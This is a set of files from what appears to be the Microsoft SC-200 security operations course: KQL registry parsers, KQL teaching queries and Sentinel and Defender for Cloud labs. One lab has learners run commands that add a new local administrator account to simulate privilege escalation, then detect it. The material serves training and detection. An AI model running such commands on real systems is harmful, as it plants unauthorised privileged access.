109 | 1. Choose the `Azure Region` for your `Microsoft Sentinel` workspace.
110 |
--------------------------------------------------------------------------------
/Allfiles/SC200_module7_ASIM_Parser_scripts.txt:
--------------------------------------------------------------------------------
1 | This file contains KQL ASIM parser scripts used in the course SC-200: Security Operations Analyst associate.
2 |
3 | # Module 7 - Lab 1 - Exercise 9 - Create ASIM parsers
4 |
5 | **Task 1 Script**
6 |
7 | ```KQL
8 | let RegistryType = datatable (TypeCode: string, TypeName: string) [
9 | "None", "Reg_None",
10 | "String", "Reg_Sz",
11 | "ExpandString", "Reg_Expand_Sz",
12 | "Binary", "Reg_Binary",
13 | "Dword", "Reg_DWord",
14 | "MultiString", "Reg_Multi_Sz",
15 | "QWord", "Reg_QWord"
16 | ];
17 | let RegistryEvents_M365D=() {
18 | DeviceRegistryEvents
19 | | extend
20 | // Event
21 | EventOriginalUid = tostring(ReportId),
22 | EventCount = int(1),
23 | EventProduct = 'M365 Defender for Endpoint',
24 | EventVendor = 'Microsoft',
25 | EventSchemaVersion = '0.1.0',
26 | EventStartTime = TimeGenerated,
27 | EventEndTime = TimeGenerated,
28 | EventType = ActionType,
29 | // Registry
30 | RegistryKey = iff (ActionType in ("RegistryKeyDeleted", "RegistryValueDeleted"), PreviousRegistryKey, RegistryKey),
31 | RegistryValue = iff (ActionType == "RegistryValueDeleted", PreviousRegistryValueName, RegistryValueName),
32 | // RegistryValueType -- original name is fine
33 | // RegistryValueData -- original name is fine
34 | RegistryKeyModified = iff (ActionType == "RegistryKeyRenamed", PreviousRegistryKey, ""),
35 | RegistryValueModified = iff (ActionType == "RegistryValueSet", PreviousRegistryValueName, ""),
36 | // RegistryValueTypeModified -- Not provided by Defender
37 | RegistryValueDataModified = PreviousRegistryValueData
38 | | lookup RegistryType on $left.RegistryValueType == $right.TypeCode
39 | | extend RegistryValueType = TypeName
40 | | project-away
41 | TypeName,
42 | PreviousRegistryKey,
43 | PreviousRegistryValueName,
44 | PreviousRegistryValueData
45 | // Device
46 | | extend
47 | DvcHostname = DeviceName,
48 | DvcId = DeviceId,
49 | Dvc = DeviceName
50 | // Users
51 | | extend
52 | ActorUsername = iff (InitiatingProcessAccountDomain == '', InitiatingProcessAccountName, strcat(InitiatingProcessAccountDomain, '\\', InitiatingProcessAccountName)),
53 | ActorUsernameType = iff(InitiatingProcessAccountDomain == '', 'Simple', 'Windows'),
54 | ActorUserIdType = 'SID'
55 | | project-away InitiatingProcessAccountDomain, InitiatingProcessAccountName
56 | | project-rename
57 | ActorUserId = InitiatingProcessAccountSid,
58 | ActorUserAadId = InitiatingProcessAccountObjectId,
59 | ActorUserUpn = InitiatingProcessAccountUpn
60 | // Processes
61 | | extend
62 | ActingProcessId = tostring(InitiatingProcessId),
63 | ParentProcessId = tostring(InitiatingProcessParentId)
64 | | project-away InitiatingProcessId, InitiatingProcessParentId
65 | | project-rename
66 | ParentProcessName = InitiatingProcessParentFileName,
67 | ParentProcessCreationTime = InitiatingProcessParentCreationTime,
68 | ActingProcessName = InitiatingProcessFolderPath,
69 | ActingProcessFileName = InitiatingProcessFileName,
70 | ActingProcessCommandLine = InitiatingProcessCommandLine,
71 | ActingProcessMD5 = InitiatingProcessMD5,
72 | ActingProcessSHA1 = InitiatingProcessSHA1, //OK
73 | ActingProcessSHA256 = InitiatingProcessSHA256,
74 | ActingProcessIntegrityLevel = InitiatingProcessIntegrityLevel,
75 | ActingProcessTokenElevation = InitiatingProcessTokenElevation,
76 | ActingProcessCreationTime = InitiatingProcessCreationTime
77 | // -- aliases
78 | | extend
79 | Username = ActorUsername,
80 | UserId = ActorUserId,
81 | UserIdType = ActorUserIdType,
82 | User = ActorUsername,
83 | CommandLine = ActingProcessCommandLine,
84 | Process = ActingProcessName
85 | };
86 | RegistryEvents_M365D
87 | ```
88 |
89 | **Task 2 Script**
90 |
91 | ```KQL
92 | let RegistryType = datatable (TypeCode: string, TypeName: string) [
93 | "%%1872", "Reg_None",
94 | "%%1873", "Reg_Sz",
95 | "%%1874", "Reg_Expand_Sz",
96 | "%%1875", "Reg_Binary",
97 | "%%1876", "Reg_DWord",
98 | "%%1879", "Reg_Multi_Sz",
99 | "%%1883", "Reg_QWord"
100 | ];
101 | let RegistryAction = datatable (EventOriginalSubType: string, EventType: string) [
102 | "%%1904", "RegistryValueSet",
103 | "%%1905", "RegistryValueSet",
104 | "%%1906", "RegistryValueDeleted"
105 | ];
106 | let Hives = datatable (KeyPrefix: string, Hive: string) [
107 | "MACHINE", "HKEY_LOCAL_MACHINE",
108 | "USER", "HKEY_USERS",
109 | ];
110 | let RegistryEvents=() {
111 | SecurityEvent
112 | // -- Filter
113 | | where EventID == 4657
114 | // Event
115 | | extend
116 | EventCount = int(1),
117 | EventVendor = 'Microsoft',
118 | EventProduct = 'Security Events',
119 | EventSchemaVersion = '0.1.0',
120 | EventStartTime = todatetime(TimeGenerated),
121 | EventEndTime = todatetime(TimeGenerated),
122 | EventOriginalType = tostring(EventID)
123 | | project-rename
124 | EventOriginalSubType = OperationType,
125 | EventOriginalUid = EventOriginId
126 | | lookup RegistryAction on EventOriginalSubType
127 | // Registry
128 | // Normalize key hive
129 | | parse ObjectName with "\\REGISTRY\\" KeyPrefix "\\" Key
130 | | lookup Hives on KeyPrefix
131 | | extend RegistryKey = strcat (Hive, "\\", Key)
132 | | project-away Hive, Key, KeyPrefix, ObjectName
133 | | project-rename
134 | RegistryValue = ObjectValueName
135 | | extend
136 | RegistryValueData = iff (EventOriginalSubType == "%%1906", OldValue, NewValue),
137 | RegistryKeyModified = iff (EventOriginalSubType == "%%1905", RegistryKey, ""),
138 | RegistryValueModified = iff (EventOriginalSubType == "%%1905", RegistryValue, ""),
139 | RegistryValueDataModified = iff (EventOriginalSubType == "%%1905", OldValue, "")
140 | | lookup RegistryType on $left.NewValueType == $right.TypeCode
141 | | project-rename RegistryValueType = TypeName
142 | | lookup RegistryType on $left.OldValueType == $right.TypeCode
143 | | project-rename RegistryValueTypeModified = TypeName
144 | | project-away OldValue, NewValue, OldValueType, NewValueType
145 | // Device
146 | | extend
147 | DvcId = SourceComputerId,
148 | DvcHostname = Computer,
149 | DvcOs = 'Windows'
150 | // User
151 | | project-rename
152 | ActorUserId = SubjectUserSid,
153 | ActorSessionId = SubjectLogonId,
154 | ActorDomainName = SubjectDomainName
155 | | extend
156 | ActorUserIdType = 'SID',
157 | ActorUsername = iff (ActorDomainName == '-', SubjectUserName, SubjectAccount),
158 | ActorUsernameType = iff(ActorDomainName == '-', 'Simple', 'Windows'),
159 | ActingProcessId = tostring(toint(ProcessId))
160 | // Process
161 | | project-rename
162 | ActingProcessName = ProcessName
163 | // -- Aliases
164 | | extend
165 | User = ActorUsername,
166 | UserId = ActorUserId,
167 | Dvc = DvcHostname,
168 | Process = ActingProcessName
169 | // -- Remove potentially confusing
170 | | project-away
171 | SubjectUserName,
172 | SubjectAccount
173 | };
174 | RegistryEvents
175 | ```
--------------------------------------------------------------------------------
/Instructions/Demos/Ignite_2024_Lab_452-06.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 06: Perform Threat Hunting in Microsoft Sentinel'
4 | module: 'Guided Project - Create detections and perform investigations using Microsoft Sentinel'
5 | ---
6 |
7 | ## Exercise overview
8 |
9 | You’re a Security Operations Analyst working at a company that implemented Microsoft Sentinel. You must learn how to detect and mitigate threats using Microsoft Sentinel. After connecting your data sources to Microsoft Sentinel, you create custom analytics rules to help discover threats and anomalous behaviors in your environment.
10 |
11 | Threat hunting queries enable and empower SOC analysts to proactively monitor and investigate potential attacks as they are developing or before they happen. Hunting within Microsoft Sentinel allows for queries that are similar to analytic rules be used to audit the environment for potentially malicious activities while allowing analysts to escalate results to incidents if needed. Sometimes, hunting threats may require data that goes beyond the retention of the analytics (hot) tier, this is where features like Search/Restore jobs can be used to ensure that the SOC has the data it needs.
12 |
13 | ## Exercise instructions
14 |
15 | ### Task 1: Perform a simulated priviledge escalation attack
16 |
17 | In this task, you will perform a simulated attack on the VM1 Azure virual machine.
18 |
19 | 1. In the Edge browser, navigate to the Azure portal at .
20 |
21 | 1. Type **Virtual machines** in the search bar and select **Virtual machines**.
22 |
23 | 1. Select the **VM1** virtual machine.
24 |
25 | 1. In the left navigation menu, expand the **Operations** section and select **Run command**.
26 |
27 | 1. In the **Run command** pane, select **RunPowerShellScript**.
28 |
29 | 1. In the **PowerShell script** box, clear any previous commands, then copy and run these commands to simulate the creation of an Admin account. Remember to press Enter after the last row::
30 |
31 | ```CommandPrompt
32 | net user theusernametoadd /add
33 | net user theusernametoadd ThePassword1!
34 | net localgroup administrators theusernametoadd /add
35 | ```
36 |
37 | 1. Monitor the *Output* section to verify the commands completed successfully.
38 |
39 | ### Task 2: Create KQL hunting queries
40 |
41 | In this task, you will create a hunting query and bookmark a result.
42 |
43 | 1. Log in to WIN1 virtual machine as Admin with the password: **Pa55w.rd**.
44 |
45 | 1. In the Edge browser, navigate to the Azure portal at .
46 |
47 | 1. In the **Sign in** dialog box, copy and paste in the **Tenant Email** account provided by your lab hosting provider and then select **Next**.
48 |
49 | 1. In the **Enter password** dialog box, copy and paste in the **Tenant Password** provided by your lab hosting provider and then select **Sign in**.
50 |
51 | 1. In the Search bar of the Azure portal, type *Sentinel*, then select **Microsoft Sentinel**.
52 |
53 | 1. Select your Microsoft Sentinel Workspace.
54 |
55 | 1. Select **Logs**
56 |
57 | 1. Enter and *Run* the following KQL Statement in the *New Query 1* space:
58 |
59 | >**Important:** You may want to paste the KQL queries into Notepad first, and then copy from there to the *New Query 1* Log window to avoid any errors.
60 |
61 | ```KQL
62 | search "administrators"
63 | | summarize count() by $table
64 | ```
65 |
66 | >**Note:** A result with the event might take up to 5 minutes to appear. Wait until it does.
67 |
68 | 1. The result might show events from different tables, but in our case, we want to investigate the SecurityEvent table. The EventID and Event that we are looking is "4732 - A member was added to a security-enabled local group". With this, we will identify adding a member to a privileged group. **Run** the following KQL query to confirm:
69 |
70 | ```KQL
71 | SecurityEvent
72 | | where EventID == 4732
73 | | where TargetAccount == "Builtin\\Administrators"
74 | ```
75 |
76 | 1. Expand the row to see all the columns related to the record. The username of the account added as Administrator does not show. The issue is that instead of storing the username, we have the Security IDentifier (SID). **Run** the following KQL to match the SID to the username that was added to the Administrators group:
77 |
78 | ```KQL
79 | SecurityEvent
80 | | where EventID == 4732
81 | | where TargetAccount == "Builtin\\Administrators"
82 | | extend Acct = MemberSid, MachId = SourceComputerId
83 | | join kind=leftouter (
84 | SecurityEvent
85 | | summarize count() by TargetSid, SourceComputerId, TargetUserName
86 | | project Acct1 = TargetSid, MachId1 = SourceComputerId, UserName1 = TargetUserName) on $left.MachId == $right.MachId1, $left.Acct == $right.Acct1
87 | ```
88 |
89 | 1. Extend the row to show the resulting columns, in the last one, we see the name of the added user under the *UserName1* column we *project* within the KQL query. It is important to help the Security Operations Analyst by providing as much context about the alert as you can. This includes projecting Entities for use in the investigation graph. **Run** the following query:
90 |
91 | ```KQL
92 | SecurityEvent
93 | | where EventID == 4732
94 | | where TargetAccount == "Builtin\\Administrators"
95 | | extend Acct = MemberSid, MachId = SourceComputerId
96 | | join kind=leftouter (
97 | SecurityEvent
98 | | summarize count() by TargetSid, SourceComputerId, TargetUserName
99 | | project Acct1 = TargetSid, MachId1 = SourceComputerId, UserName1 = TargetUserName) on $left.MachId == $right.MachId1, $left.Acct == $right.Acct1
100 | | extend timestamp = TimeGenerated, HostCustomEntity = Computer, AccountCustomEntity = UserName1
101 | ```
102 |
103 | 1. Now that you have a good detection rule, in the Logs window, select **+ New alert rule** in the command bar and then select **Create Microsoft Sentinel alert**. **Hint:** You might need to select the ellipsis (...) button in the command bar.
104 |
105 | 1. This starts the "Analytics rule wizard". For the *General* tab type:
106 |
107 | |Setting|Value|
108 | |---|---|
109 | |Name|**SecurityEvent Local Administrators User Add**|
110 | |Description|**User added to Local Administrators group**|
111 | |Tactics|**Privilege Escalation**|
112 | |Severity|**High**|
113 |
114 | 1. Select **Next: Set rule logic >** button.
115 |
116 | 1. On the *Set rule logic* tab, the *Rule query* should be populated already with you KQL query, as well the entities under *Alert enhancement - Entity mapping*.
117 |
118 | |Entity|Identifier|Data Field|
119 | |:----|:----|:----|
120 | |Account|FullName|AccountCustomEntity|
121 | |Host|Hostname|HostCustomEntity|
122 |
123 | 1. If **Hostname** isn't selected for *Host* Entity, select it from the drop-down list and use the parameters in the preceding table to populate the fields.
124 |
125 | 1. For *Query scheduling* set the following:
126 |
127 | |Setting|Value|
128 | |---|---|
129 | |Run Query every|5 minutes|
130 | |Lookup data from the last|1 Days|
131 |
132 | >**Note:** We are purposely generating many incidents for the same data. This enables the Lab to use these alerts.
133 |
134 | 1. Leave the rest of the options with the defaults. Select **Next: Incident settings>** button.
135 |
136 | 1. For the *Incident settings* tab, leave the default values and select **Next: Automated response >** button.
137 |
138 |
150 |
151 | 1. 1. On the *Automated response* tab select the **Next: Review and create >** button.
152 |
153 | 1. On the *Review and create* tab, select the **Create** button to create the new Scheduled Analytics rule.
154 |
--------------------------------------------------------------------------------
/Instructions/Demos/Ignite_2024_Lab_455-03.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 3 - Mitigate threats using Microsoft Defender for Cloud'
4 | module: 'Explore Secure Score, Recommendations and Inventory'
5 | ---
6 |
7 | # Exercise 3 - Explore Secure Score, Recommendations and Inventory
8 |
9 | ## Lab scenario
10 |
11 | Previously, we briefly explored the *Secure score* tile on the overview page. Now let’s dive into this capability and the associated recommendations. Microsoft Defender for Cloud continually assesses your resources. All findings are aggregated into a single score (Secure score), which measures the current security posture of your subscription; the higher the score, the lower the identified risk level.
12 |
13 |
24 |
25 | ### Task 1: Exploring Security Controls and Recommendations
26 |
27 | 1. In the Microsoft Defender for Cloud left navigation menu, under the General section, select Recommendations.
28 |
29 | 1. On the Recommendations page, select the **Switch to classic view** link from the top menu. Notice the first part of the page; the summary view, which includes the current *Secure score*, progress on the recommendations (both completed security controls and recommendations) and resource health (by severity).
30 |
31 | 1. On the top menu, select the **Download CSV report** button – this allows you to get a snapshot of your resources, their health status, and the associated recommendations. You can use it for pivoting and reporting.
32 |
33 | 1. Select a Recommendation from the drop down list to review the format such as *Storage account public access should be disallowed*.
34 |
35 | >**Note:** If that recommendation is not available in the lab environment, select one that is available.
36 |
37 | 1. On the top section, notice the following:
38 |
39 | - Title of the recommendation: Storage account public access should be disallowed
40 | - Top menu controls: Exempt, Deny, View policy definition and Open query
41 | - Severity indicator: Medium
42 | - Freshness interval: 30 Min
43 | - Tactics and techniques: Initial Access
44 |
45 | 1. The next important part is the Remediation Steps which contains the remediation logic where you can remediate the selected resource/s.
46 |
47 | >**Info:** In the recommendation list, you can now see some recommendations flagged as in the preview. They aren’t included in the calculation of your score. They should be still remediated so that when the preview period ends, they will contribute towards your final score.
48 |
49 | ### Task 2: Exploring the Inventory capability
50 |
51 | The *Asset inventory* dashboard allows you to get a single pane of glass view of all your resources covered by Microsoft Defender for Cloud. It also provides per-resource visibility to all Microsoft Defender for Cloud’s information and additional resource details including security posture and protection status. Since this dashboard is based on Azure Resource Graph (ARG), you can run queries across subscriptions at a large scale, quickly and easily
52 |
53 | 1. From the left navigation menu, under the General section, select **Inventory**.
54 |
55 |
56 |
57 | 1. In your environment, these numbers may not be the same, since it varies in time
58 |
59 | 1. Notice the total number of resources, The total number of resources are the ones that are connected to the Microsoft Defender for Cloud and NOT the total number of resources that you have in your subscriptions.
60 |
61 | 1. Notice the number of unhealthy resources, The unhealthy resources are the resources with actionable recommendations based on the selected filter
62 |
63 | 1. Use the Filter by name box to search for **virtual**. You should now see a filtered view containing your desired resource: *VM1* and a few other resources like virtual networks and subnets. Hover on the red bar in the recommendations column to see a tooltip with the active recommendations. You should expect to see Active-xx of xx Recommendations – these are the active recommendations you must attend.
64 |
65 | 1. Open the resource health pane by selecting the resource. Select *VM1*.
66 |
67 | 1. On the resource health pane for *VM1*, review the virtual machine information alongside the recommendation list.
68 |
69 | >**Note:** It could take up to 24 hours for all the recommendations to show up. And it is possible that during lab time, this may not show up – which is the case sometimes. If you don't see the data in recommendations. You can continue to the next exercise and verify this later.
70 |
71 | 1. From the filter pane, remove the Resource type filter, then select **Add filter** and notice the Security findings filter – it allows you to find all resources that are prone to a specific vulnerability. You can also search for CVE, KB ID, name, and missing update.
72 |
73 | > | Security Finding value | What it represents |
74 | > | :--- | :--- |
75 | > | CVE | Common vulnerabilities and exposures |
76 | > | KB | Knowledge Base - usually patchers |
77 | > | ID | Defender for Cloud internal specific issues |
78 |
79 | 1. From the filter pane, remove the Security findings filter you added in the previous step then from the top menu, select **Open query**
80 |
81 | 1. On the **Azure Resource Graph Explorer** blade, select **Run Query**. You should now have the same list of resources and columns as in the previous step. This query is editable for your needs and here it gets very powerful.
82 |
83 | 1. Save the query for later use by selecting **Save as** from the top menu. You can use it to create periodic reports. Name the report as asc-filtered-query and select Save.
84 |
85 | ### Task 3: Understanding pricing
86 |
87 | The pricing criteria depend on the plan you enable. In addition, as a part of Foundational CSPM (free), you get several items like Secure Score, Asset Inventory, Security Recommendations, etc.
88 |
89 | Refer to the following to learn more about Defender for cloud pricing:
90 |
91 | - [Pricing Page](https://azure.microsoft.com/pricing/details/defender-for-cloud/?v=17.23h)
92 | - [Foundational CSPM vs. Defender CSPM capabilities](https://learn.microsoft.com/azure/defender-for-cloud/concept-cloud-security-posture-management)
93 |
94 | 1. From Microsoft Defender for Cloud navigation menu, select **Workbooks** and select the **Public Templates** tab. Next select the **Cost Estimation** workbook.
95 | 1. In the *Cost Estimation* workbook, you can observe the estimated pricing for the resources in both the Defender plans for Azure.
96 |
97 | ### Task 4: Overview of CWP capabilities
98 |
99 | 1. Navigate to **Workload protections**from the Cloud Security section of the Microsoft Defender for Cloud menu to view the Workload Protections Dashboard.
100 |
101 | The dashboard includes the following sections:
102 |
103 | - Microsoft Defender for Cloud coverage (1) - Here you can see the resource types that are in your subscription and eligible for protection by Defender for Cloud. Wherever relevant, you can upgrade here as well. If you want to upgrade all possible eligible resources, select Upgrade All.
104 | - ecurity alerts (2) - When Defender for Cloud detects a threat in any area of your environment, it generates an alert. These alerts describe details of the affected resources, suggested remediation steps, and in some cases an option to trigger a logic app in response. Selecting anywhere in this graph opens the Security Alerts page.
105 | - Advanced protection (3) - Defender for Cloud includes many advanced threat protection capabilities for virtual machines, SQL databases, containers, web applications, your network, and more. In this advanced protection section, you can see the status of the resources in your selected subscriptions for each of these protections. Select any of them to go directly to the configuration area for that protection type.
106 | - Insights (4) - This rolling pane of news, suggested reading and high-priority alerts give Defender for Cloud insights into pressing security matters that are relevant to you and your subscription. Whether it's a list of high-severity CVEs discovered on your VMs by a vulnerability analysis tool, or a new blog post by a member of the Defender for Cloud team, you'll find it here in the Insights panel.
107 |
108 | ## You have completed the lab
109 |
--------------------------------------------------------------------------------
/Allfiles/SC200_module4_KQL_scripts.txt:
--------------------------------------------------------------------------------
1 | This file contains KQL scripts used in the course SC-200: Security Operations Analyst associate, Module 4 -
2 |
3 |
4 | # Module 4 - Lab 1 - Exercise 1 - Create queries for Microsoft Sentinel using Kusto Query Language (KQL)
5 |
6 | ## Lab scenario
7 | You are a Security Operations Analyst working at a company that is implementing Microsoft Sentinel. You are responsible for performing log data analysis to search for malicious activity, display visualizations, and perform threat hunting. To query log data, you use the Kusto Query Language (KQL).
8 |
9 | >**Hint:** This lab involves entering many KQL scripts into Microsoft Sentinel. The scripts were provided in a file at the beginning of this lab. An alternate location to download them is: https://github.com/MicrosoftLearning/SC-200T00A-Microsoft-Security-Operations-Analyst/tree/master/Allfiles
10 |
11 |
12 | ### Task 1: Access the KQL testing area.
13 |
14 | In this task, you will access a Log Analytics environment where you can practice writing KQL statements.
15 |
16 | 1. Login to WIN1 virtual machine as Admin with the password: **Pa55w.rd**.
17 |
18 | 2. Go to https://aka.ms/lademo in your browser. Login with the MOD Administrator credentials.
19 |
20 | 3. Explore the available tables listed in the tab on the left side of the screen.
21 |
22 | 4. In the query editor, enter the following query and select the **Run** button. You should see the query results in the bottom window.
23 |
24 | ```KQL
25 | SecurityEvent
26 | ```
27 |
28 | 5. Notice that you have reached the maximum number of results (30,000).
29 |
30 | 6. Change the *Time range* to **Last 30 minutes** in the Query Window.
31 |
32 | 7. Next to the first record, select the **>** to expand the information for the row.
33 |
34 |
35 | ### Task 2: Run Basic KQL Statements
36 |
37 | In this task, you will build basic KQL statements.
38 |
39 | >**Important:** For each query, clear the previous statement from the Query Window or open a new Query Windows by selecting **+** after the last opened tab (up to 25).
40 |
41 | 1. The following statement demonstrates the **search** operator, which searches all columns in the table for the value. In the Query Window enter the following statement and select **Run**:
42 |
43 | ```KQL
44 | search "location"
45 | ```
46 |
47 | 2. The following statement demonstrates searching across tables listed with the "in" clause. Enter the following statement and select **Run**:
48 |
49 | ```KQL
50 | search in (SecurityEvent,App*) "new"
51 | ```
52 |
53 | 3. Change back the *Time range* to **Last 24 hours** in the Query Window.
54 |
55 | 4. The following statements demonstrates the where operator. In the Query Window. Enter the following statement and select **Run**:
56 |
57 | >**Important:** You should "run" after entering the query from each code block below.
58 |
59 | ```KQL
60 | SecurityEvent
61 | | where TimeGenerated > ago(1h)
62 | ```
63 |
64 | ```KQL
65 | SecurityEvent
66 | | where TimeGenerated > ago(1h) and EventID == "4624"
67 | ```
68 |
69 | ```KQL
70 | SecurityEvent
71 | | where TimeGenerated > ago(1h)
72 | | where EventID == 4624
73 | | where AccountType =~ "user"
74 | ```
75 |
76 | ```KQL
77 | SecurityEvent
78 | | where TimeGenerated > ago(1h) and EventID in (4624, 4625)
79 | ```
80 |
81 | 5. The following statement demonstrates the use of the let statement to declare variables. In the Query Window. Enter the following statement and select **Run**:
82 |
83 | ```KQL
84 | let timeOffset = 1h;
85 | let discardEventId = 4688;
86 | SecurityEvent
87 | | where TimeGenerated > ago(timeOffset*2) and TimeGenerated < ago(timeOffset)
88 | | where EventID != discardEventId
89 | ```
90 |
91 | 6. The following statement demonstrates the use of the let statement to declare a dynamic list. In the Query Window enter the following statement and select **Run**:
92 |
93 | ```KQL
94 | let suspiciousAccounts = datatable(account: string) [
95 | @"NA\timadmin",
96 | @"NT AUTHORITY\SYSTEM"
97 | ];
98 | SecurityEvent
99 | | where TimeGenerated > ago(1h)
100 | | where Account in (suspiciousAccounts)
101 | ```
102 |
103 | >**Tip:** You can re-format the query easily by selecting the ellipsis (...) in the Query window and select **Format query**.
104 |
105 | 7. The following statement demonstrates the use of the "let" statement to declare a dynamic table. In the Query Window. Enter the following statement and select **Run**:
106 |
107 | ```KQL
108 | let LowActivityAccounts =
109 | SecurityEvent
110 | | summarize cnt = count() by Account
111 | | where cnt < 1000;
112 | LowActivityAccounts | where Account contains "sql"
113 | ```
114 |
115 | 8. Change the **Time range** to **Last hour** in the Query Window. This will limit our results for the following statements.
116 |
117 | 9. The following statement demonstrates creating fields using the extend operator In the Query Window. Enter the following statement and select **Run**:
118 |
119 | ```KQL
120 | SecurityEvent
121 | | where TimeGenerated > ago(1h)
122 | | where ProcessName != "" and Process != ""
123 | | extend StartDir = substring(ProcessName,0, string_size(ProcessName)-string_size(Process))
124 | ```
125 |
126 | 10. The following statement demonstrates sorting results using the order by operator. In the Query Window. Enter the following statement and select **Run**:
127 |
128 | ```KQL
129 | SecurityEvent
130 | | where TimeGenerated > ago(1h)
131 | | where ProcessName != "" and Process != ""
132 | | extend StartDir = substring(ProcessName,0, string_size(ProcessName)-string_size(Process))
133 | | order by StartDir desc, Process asc
134 | ```
135 |
136 | 11. The following statements demonstrate specifying fields for the result set using the project operators.
137 |
138 | >**Note:** You should "Run" after entering the query from each code block below.
139 |
140 | In the Query Window. Enter the following statement and select **Run**:
141 |
142 | ```KQL
143 | SecurityEvent
144 | | where TimeGenerated > ago(1h)
145 | | project Computer, Account
146 | ```
147 |
148 | ```KQL
149 | SecurityEvent
150 | | where TimeGenerated > ago(1h)
151 | | where ProcessName != "" and Process != ""
152 | | extend StartDir = substring(ProcessName,0, string_size(ProcessName)-string_size(Process))
153 | | order by StartDir desc, Process asc
154 | | project Process, StartDir
155 | ```
156 |
157 | ```KQL
158 | SecurityEvent
159 | | where TimeGenerated > ago(1h)
160 | | where ProcessName != "" and Process != ""
161 | | extend StartDir = substring(ProcessName,0, string_size(ProcessName)-string_size(Process))
162 | | order by StartDir desc, Process asc
163 | | project-away ProcessName
164 | ```
165 |
166 |
167 | ### Task 3: Analyze Results in KQL with the Summarize Operator
168 |
169 | In this task, you will build KQL statements to prepare data.
170 |
171 | 1. The following statement demonstrates the count() function. In the Query Window. Enter the following statement and select **Run**:
172 |
173 | ```KQL
174 | SecurityEvent
175 | | where TimeGenerated > ago(1h) and EventID == "4688"
176 | | summarize count() by Process, Computer
177 | ```
178 |
179 | 2. The following statement demonstrates the count() function. In the Query Window. Enter the following statement and select **Run**:
180 |
181 | ```KQL
182 | SecurityEvent
183 | | where TimeGenerated > ago(1h) and EventID == 4624
184 | | summarize cnt=count() by AccountType, Computer
185 | ```
186 |
187 | 3. The following statement demonstrates the dcount() function. In the Query Window. Enter the following statement and select **Run**:
188 |
189 | ```KQL
190 | SecurityEvent
191 | | where TimeGenerated > ago(1h)
192 | | summarize dcount(IpAddress)
193 | ```
194 |
195 | 4. The following statement is a rule to detect Invalid password failures across multiple applications for the same account. In the Query Window enter the following statement and select **Run**:
196 |
197 | ```KQL
198 | let timeframe = 30d;
199 | let threshold = 1;
200 | SigninLogs
201 | | where TimeGenerated >= ago(timeframe)
202 | | where ResultDescription has "Invalid password"
203 | | summarize applicationCount = dcount(AppDisplayName) by UserPrincipalName, IPAddress
204 | | where applicationCount >= threshold
205 | ```
206 |
207 | 5. The following statement demonstrates the arg_max() function.
208 |
209 | The following statement will return the most current row from the SecurityEvent table for the computer SQL10.NA.contosohotels.com. The * in the arg_max function requests all columns for the row. In the Query Window. Enter the following statement and select **Run**:
210 |
211 | ```KQL
212 | SecurityEvent
213 | | where Computer == "SQL10.na.contosohotels.com"
214 | | summarize arg_max(TimeGenerated,*) by Computer
215 | ```
216 |
217 | 6. The following statement demonstrates the arg_min() function.
218 |
219 | In this statement, the oldest SecurityEvent for the computer SQL10.NA.contosohotels.com will be returned as the result set. In the Query Window. Enter the following statement and select **Run**:
220 |
221 | ```KQL
222 | SecurityEvent
223 | | where Computer == "SQL10.na.contosohotels.com"
224 | | summarize arg_min(TimeGenerated,*) by Computer
225 | ```
226 |
227 | 7. The following statements demonstrate the importance of understanding results based on the order of the pipe "|". In the Query Window. Enter the following queries and run each separately:
228 |
229 | **Query 1** will have Accounts for which the last activity was a login. The SecurityEvent table will first be summarized and return the most current row for each Account. Then only rows with EventID equals 4624 (login) will be returned.
230 |
231 | ```KQL
232 | SecurityEvent
233 | | summarize arg_max(TimeGenerated, *) by Account
234 | | where EventID == "4624"
235 | ```
236 |
237 | **Query 2** will have the most recent login for Accounts that have logged in. The SecurityEvent table will be filtered to only include EventID = 4624. Then these results will be summarized for the most current login row by Account.
238 |
239 | ```KQL
240 | SecurityEvent
241 | | where EventID == "4624"
242 | | summarize arg_max(TimeGenerated, *) by Account
243 | ```
244 |
245 | >**Note:** You can also review the "Total CPU" and "Data used for processed query" by selecting the bar "Completed" and compare the data between both statements.
246 |
247 | 8. The following statement demonstrates the make_list() function.
248 |
249 | The make_list function returns a dynamic (JSON) array of all the values of Expression in the group. This KQL query will first filter the EventID with the where operator. Next, for each Computer, the results are a JSON array of Accounts. The resulting JSON array will include duplicate accounts.
250 |
251 | In the Query Window. Enter the following statement and select **Run**:
252 |
253 | ```KQL
254 | SecurityEvent
255 | | where TimeGenerated > ago(1h)
256 | | where EventID == "4624"
257 | | summarize make_list(Account) by Computer
258 | ```
259 |
260 | 9. The following statement demonstrates the make_set() function.
261 |
262 | The make_set function returns a dynamic (JSON) array containing *distinct* values that Expression takes in the group. This KQL query will first filter the EventID with the where operator. Next, for each Computer, the results are a JSON array of unique Accounts. In the Query Window. Enter the following statement and select **Run**:
263 |
264 | ```KQL
265 | SecurityEvent
266 | | where TimeGenerated > ago(1h)
267 | | where EventID == "4624"
268 | | summarize make_set(Account) by Computer
269 | ```
270 |
271 | ### Task 4: Create visualizations in KQL with the Render Operator
272 |
273 | In this task, you will use generate visualizations with KQL statements.
274 |
275 | 1. The following statement demonstrates the render operator visualizing results with a barchart. In the Query Window. Enter the following statement and select **Run**:
276 |
277 | ```KQL
278 | SecurityEvent
279 | | where TimeGenerated > ago(1h)
280 | | summarize count() by Account
281 | | render barchart
282 | ```
283 |
284 | 2. The following statement demonstrates the render operator visualizing results with a time series.
285 |
286 | The bin() function rounds values down to an integer multiple of the given bin size. Used frequently in combination with summarize by .... If you have a scattered set of values, the values are grouped into a smaller set of specific values. Combining the generated time series and pipe to a render operator with a type of timechart provides a time series visualization. In the Query Window. Enter the following statement and select **Run**:
287 |
288 | ```KQL
289 | SecurityEvent
290 | | where TimeGenerated > ago(1h)
291 | | summarize count() by bin(TimeGenerated, 1m)
292 | | render timechart
293 | ```
294 |
295 |
296 | ### Task 5: Build multi-table statements in KQL
297 |
298 | In this task, you will build multi-table KQL statements.
299 |
300 | 1. The following statement demonstrates the union operator that takes two or more tables and returns the rows of all of them. Understanding how results are passed and impacted with the pipe character is essential. In the Query Window. Enter the following statements and select **Run** for each separately to see the results:
301 |
302 | **Query 1** will return all rows of SecurityEvent and all rows of SigninLogs.
303 |
304 | ```KQL
305 | SecurityEvent
306 | | union SigninLogs
307 | ```
308 |
309 | **Query 2** will return one row and column, which is the count of all rows of SecurityEvent and all rows of SigninLogs.
310 |
311 | ```KQL
312 | SecurityEvent
313 | | union SigninLogs
314 | | summarize count()
315 | ```
316 |
